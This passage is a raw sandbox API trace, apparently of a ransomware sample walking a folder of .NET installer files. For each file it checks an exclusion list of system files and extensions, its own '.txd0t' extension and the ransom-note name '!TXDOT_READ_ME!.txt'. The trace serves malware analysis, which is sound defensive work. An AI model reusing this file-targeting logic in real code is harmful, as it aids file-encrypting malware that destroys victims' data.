returned="C:\\588bce7c90097ed212\\netfx_Core.mzz" [0071.741] PathFindExtensionW (pszPath="netfx_Core.mzz") returned=".mzz" [0071.741] StrCmpW (psz1=".mzz", psz2=".txd0t") returned -1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2="bootsect.bak") returned 1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2="iconcache.db") returned 1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2="thumbs.db") returned -1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2=" ransomware ") returned 1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2=" ransom ") returned 1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2="debug.txt") returned 1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2="boot.ini") returned 1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2="desktop.ini") returned 1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2="autorun.inf") returned 1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2="ntuser.dat") returned -1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2="ntldr") returned -1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2="ntdetect.com") returned -1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2="bootfont.bin") returned 1 [0071.741] StrCmpIW (psz1="netfx_Core.mzz", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.741] PathFindExtensionW (pszPath="netfx_Core.mzz") returned=".mzz" [0071.741] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mzz") returned 0x0 [0071.741] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.741] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.742] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.742] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.742] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.742] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.742] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0xc183da00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d0200, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Core_x64.msi", cAlternateFileName="NETFX_~1.MSI")) returned 1 [0071.742] StrCmpW (psz1="netfx_Core_x64.msi", psz2=".") returned 1 [0071.742] StrCmpW (psz1="netfx_Core_x64.msi", psz2="..") returned 1 [0071.742] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.742] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.742] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Core_x64.msi", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" [0071.742] PathFindExtensionW (pszPath="netfx_Core_x64.msi") returned=".msi" [0071.742] StrCmpW (psz1=".msi", psz2=".txd0t") returned -1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="bootsect.bak") returned 1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="iconcache.db") returned 1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="thumbs.db") returned -1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2=" ransomware ") returned 1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2=" ransom ") returned 1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="debug.txt") returned 1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="boot.ini") returned 1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="desktop.ini") returned 1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="autorun.inf") returned 1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="ntuser.dat") returned -1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="ntldr") returned -1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="ntdetect.com") returned -1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="bootfont.bin") returned 1 [0071.742] StrCmpIW (psz1="netfx_Core_x64.msi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.743] PathFindExtensionW (pszPath="netfx_Core_x64.msi") returned=".msi" [0071.743] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msi") returned 0x0 [0071.743] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.743] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.743] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.743] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.743] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.743] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.743] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x4c130c00, ftLastWriteTime.dwHighDateTime=0x1cac6d9, nFileSizeHigh=0x0, nFileSizeLow=0x11c000, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Core_x86.msi", cAlternateFileName="NETFX_~2.MSI")) returned 1 [0071.743] StrCmpW (psz1="netfx_Core_x86.msi", psz2=".") returned 1 [0071.743] StrCmpW (psz1="netfx_Core_x86.msi", psz2="..") returned 1 [0071.743] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.743] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.743] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Core_x86.msi", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" [0071.743] PathFindExtensionW (pszPath="netfx_Core_x86.msi") returned=".msi" [0071.743] StrCmpW (psz1=".msi", psz2=".txd0t") returned -1 [0071.743] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="bootsect.bak") returned 1 [0071.743] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="iconcache.db") returned 1 [0071.743] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="thumbs.db") returned -1 [0071.743] StrCmpIW (psz1="netfx_Core_x86.msi", psz2=" ransomware ") returned 1 [0071.743] StrCmpIW (psz1="netfx_Core_x86.msi", psz2=" ransom ") returned 1 [0071.743] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="debug.txt") returned 1 [0071.743] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="boot.ini") returned 1 [0071.743] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="desktop.ini") returned 1 [0071.744] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="autorun.inf") returned 1 [0071.744] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="ntuser.dat") returned -1 [0071.744] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="ntldr") returned -1 [0071.744] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="ntdetect.com") returned -1 [0071.744] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="bootfont.bin") returned 1 [0071.744] StrCmpIW (psz1="netfx_Core_x86.msi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.744] PathFindExtensionW (pszPath="netfx_Core_x86.msi") returned=".msi" [0071.744] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msi") returned 0x0 [0071.744] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.744] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.744] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.744] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.744] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.744] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.744] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7cd9415, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x29222c7, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Extended.mzz", cAlternateFileName="NETFX_~2.MZZ")) returned 1 [0071.744] StrCmpW (psz1="netfx_Extended.mzz", psz2=".") returned 1 [0071.744] StrCmpW (psz1="netfx_Extended.mzz", psz2="..") returned 1 [0071.744] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.744] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.744] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Extended.mzz", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned="C:\\588bce7c90097ed212\\netfx_Extended.mzz" [0071.744] PathFindExtensionW (pszPath="netfx_Extended.mzz") returned=".mzz" [0071.744] StrCmpW (psz1=".mzz", psz2=".txd0t") returned -1 [0071.744] StrCmpIW (psz1="netfx_Extended.mzz", psz2="bootsect.bak") returned 1 [0071.744] StrCmpIW (psz1="netfx_Extended.mzz", psz2="iconcache.db") returned 1 [0071.744] StrCmpIW (psz1="netfx_Extended.mzz", psz2="thumbs.db") returned -1 [0071.744] StrCmpIW (psz1="netfx_Extended.mzz", psz2=" ransomware ") returned 1 [0071.744] StrCmpIW (psz1="netfx_Extended.mzz", psz2=" ransom ") returned 1 [0071.744] StrCmpIW (psz1="netfx_Extended.mzz", psz2="debug.txt") returned 1 [0071.744] StrCmpIW (psz1="netfx_Extended.mzz", psz2="boot.ini") returned 1 [0071.745] StrCmpIW (psz1="netfx_Extended.mzz", psz2="desktop.ini") returned 1 [0071.745] StrCmpIW (psz1="netfx_Extended.mzz", psz2="autorun.inf") returned 1 [0071.745] StrCmpIW (psz1="netfx_Extended.mzz", psz2="ntuser.dat") returned -1 [0071.745] StrCmpIW (psz1="netfx_Extended.mzz", psz2="ntldr") returned -1 [0071.745] StrCmpIW (psz1="netfx_Extended.mzz", psz2="ntdetect.com") returned -1 [0071.745] StrCmpIW (psz1="netfx_Extended.mzz", psz2="bootfont.bin") returned 1 [0071.745] StrCmpIW (psz1="netfx_Extended.mzz", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.745] PathFindExtensionW (pszPath="netfx_Extended.mzz") returned=".mzz" [0071.745] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mzz") returned 0x0 [0071.745] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.745] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.745] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.745] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.745] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.745] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.745] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Extended_x64.msi", cAlternateFileName="NETFX_~3.MSI")) returned 1 [0071.745] StrCmpW (psz1="netfx_Extended_x64.msi", psz2=".") returned 1 [0071.745] StrCmpW (psz1="netfx_Extended_x64.msi", psz2="..") returned 1 [0071.745] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.745] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.745] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Extended_x64.msi", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" [0071.745] PathFindExtensionW (pszPath="netfx_Extended_x64.msi") returned=".msi" [0071.745] StrCmpW (psz1=".msi", psz2=".txd0t") returned -1 [0071.745] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="bootsect.bak") returned 1 [0071.745] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="iconcache.db") returned 1 [0071.745] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="thumbs.db") returned -1 [0071.746] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2=" ransomware ") returned 1 [0071.746] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2=" ransom ") returned 1 [0071.746] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="debug.txt") returned 1 [0071.746] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="boot.ini") returned 1 [0071.746] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="desktop.ini") returned 1 [0071.746] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="autorun.inf") returned 1 [0071.746] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="ntuser.dat") returned -1 [0071.746] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="ntldr") returned -1 [0071.746] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="ntdetect.com") returned -1 [0071.746] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="bootfont.bin") returned 1 [0071.746] StrCmpIW (psz1="netfx_Extended_x64.msi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.746] PathFindExtensionW (pszPath="netfx_Extended_x64.msi") returned=".msi" [0071.746] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msi") returned 0x0 [0071.746] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.746] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.746] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.746] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.746] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.746] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.746] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Extended_x86.msi", cAlternateFileName="NETFX_~4.MSI")) returned 1 [0071.747] StrCmpW (psz1="netfx_Extended_x86.msi", psz2=".") returned 1 [0071.747] StrCmpW (psz1="netfx_Extended_x86.msi", psz2="..") returned 1 [0071.747] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.747] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.747] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Extended_x86.msi", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" [0071.747] PathFindExtensionW (pszPath="netfx_Extended_x86.msi") returned=".msi" [0071.747] StrCmpW (psz1=".msi", psz2=".txd0t") returned -1 [0071.747] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="bootsect.bak") returned 1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="iconcache.db") returned 1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="thumbs.db") returned -1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2=" ransomware ") returned 1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2=" ransom ") returned 1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="debug.txt") returned 1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="boot.ini") returned 1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="desktop.ini") returned 1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="autorun.inf") returned 1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="ntuser.dat") returned -1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="ntldr") returned -1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="ntdetect.com") returned -1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="bootfont.bin") returned 1 [0071.748] StrCmpIW (psz1="netfx_Extended_x86.msi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.748] PathFindExtensionW (pszPath="netfx_Extended_x86.msi") returned=".msi" [0071.748] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msi") returned 0x0 [0071.748] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.748] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.748] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.748] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.748] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.748] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.748] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="ParameterInfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0071.748] StrCmpW (psz1="ParameterInfo.xml", psz2=".") returned 1 [0071.748] StrCmpW (psz1="ParameterInfo.xml", psz2="..") returned 1 [0071.748] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.749] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.749] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="ParameterInfo.xml", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned="C:\\588bce7c90097ed212\\ParameterInfo.xml" [0071.749] PathFindExtensionW (pszPath="ParameterInfo.xml") returned=".xml" [0071.749] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2="bootsect.bak") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2="iconcache.db") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2="thumbs.db") returned -1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2=" ransomware ") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2=" ransom ") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2="debug.txt") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2="boot.ini") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2="desktop.ini") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2="autorun.inf") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2="ntuser.dat") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2="ntldr") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2="ntdetect.com") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2="bootfont.bin") returned 1 [0071.749] StrCmpIW (psz1="ParameterInfo.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.749] PathFindExtensionW (pszPath="ParameterInfo.xml") returned=".xml" [0071.749] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.749] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.749] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.749] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.749] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.749] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.749] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.750] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, 